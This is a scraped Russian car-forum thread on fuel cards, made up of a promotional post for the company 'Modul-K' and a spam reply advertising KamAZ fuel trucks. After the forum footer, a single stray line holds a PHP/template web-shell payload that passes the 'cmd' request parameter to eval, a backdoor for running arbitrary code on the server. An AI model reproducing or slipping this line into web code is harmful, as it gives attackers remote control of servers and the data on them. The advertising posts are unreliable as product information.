+ Ответить в теме
Показано с 1 по 2 из 2

Тема: Топливные карты


  1. #1
    GTI-Racing Borys45 is on a distinguished road Аватар для Borys45
    Регистрация
    18.08.2020
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    253

    Топливные карты

    Топливная карта — это современный инструмент оплаты и управления процессом заправки. Такой инструмент – настоящее спасение для юридических лиц и индивидуальных предпринимателей. Учет топлива дело тонкое и не простое и если у вас возникла необходимость как-то структурировать ваши расходы на топливо, то мы вам поможем.

    Топливная компания "Модуль-К" работает в этой сфере около 10 лет. Сеть АЗС "Модуль-К" насчитывает более чем 13000 станций на территории России и стран СНГ. Мы сотрудничаем с такими компаниями, как: Роснефть, Газпромнефть, ЕКА, ТНК, Татнефть, ПТК, ВТК, Лукойл и рядом других региональных партнёров.

    Покупая топливные карты https://modulcard.ru/ вы получаете доступ в личный кабинет, откуда у вас появляется возможность видеть всю информацию по расходам на бензин и контролировать свои средства. Помимо этого, топливные карты для бизнеса имеют множество преимуществ.

    Во-первых, это удобство в использовании и скорость в обслуживании. Вам предоставляется возможность безналичного расчета с выгодой до 25%, возмещение налогового вычета по НДС, а также гибкий выбор тарифов в зависимости от потребностей вашего бизнеса. Все условия оплаты согласовываются индивидуально. По сколько "Модуль-К" – клиентоориентированная компания.

    Во-вторых, использование топливной карты исключает перерасход и нецелевое использование средств, возможные махинации. Это особенно необходимо, для тех предприятий, которые используют транспорт. Руководителю доступна вся информация о заправке транспорта. Она находится в личном кабинете в режиме онлайн, для проверки и учета достаточно открыть электронную базу – и все необходимые данные под рукой. Для безопасности можно установить лимит по использованию топлива.

    Карты от компании "Модуль-К" имеют высокую степень защиты, они защищены от взлома и несанкционированного использования. Каждый клиент получит индивидуальное сопровождение от высококвалифицированного представителя компании и возможность круглосуточной консультации по всем волнующим вопросам. При утрате топливной карты вы можете осуществить быструю её блокировку.

    Топливная карта – незаменимая вещь для вашего бизнеса. Мы гарантируем бесперебойность круглосуточной заправки наших клиентов по всей России и странам СНГ.
    Последний раз редактировалось Borys45; 22.01.2021 в 01:44.

  2. #2
    GTI-Racing Semen Leonidovich is on a distinguished road Аватар для Semen Leonidovich
    Регистрация
    05.04.2020
    Откуда
    Мск
    Машина
    Бричка
    Сообщений
    249
    Наверное на каждой заправке должен быть свой бензонасос и бензовоз, если нет еще такого то сразу нужно заказывать, я лично нашел очень классный такой интернет магазин где вы сможете заказать запросто очень дешевый камаз с бензовозом, так что переходите камаз бензовоз https://chmz.org/produktsiya/atz-kamaz/

+ Ответить в теме

Похожие темы

  1. Топливные форсунки от S3 или ТТ 225сил
    от inVENTOr в разделе Тюнинг: двигатель, впрыск, впуск/выпуск
    Ответов: 14
    Последнее сообщение: 02.10.2023, 00:14
  2. Новые топливные насосы и компрессоры кондиционера
    от qwerty585 в разделе Покупка и продажа запчастей
    Ответов: 8
    Последнее сообщение: 21.06.2016, 15:00
  3. Топливные форсунки Siemens Deka 630cc
    от maxi057 в разделе Тюнинг
    Ответов: 1
    Последнее сообщение: 31.05.2016, 02:13
  4. GPS карты
    от alparis в разделе Разное
    Ответов: 2
    Последнее сообщение: 13.10.2010, 12:28

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}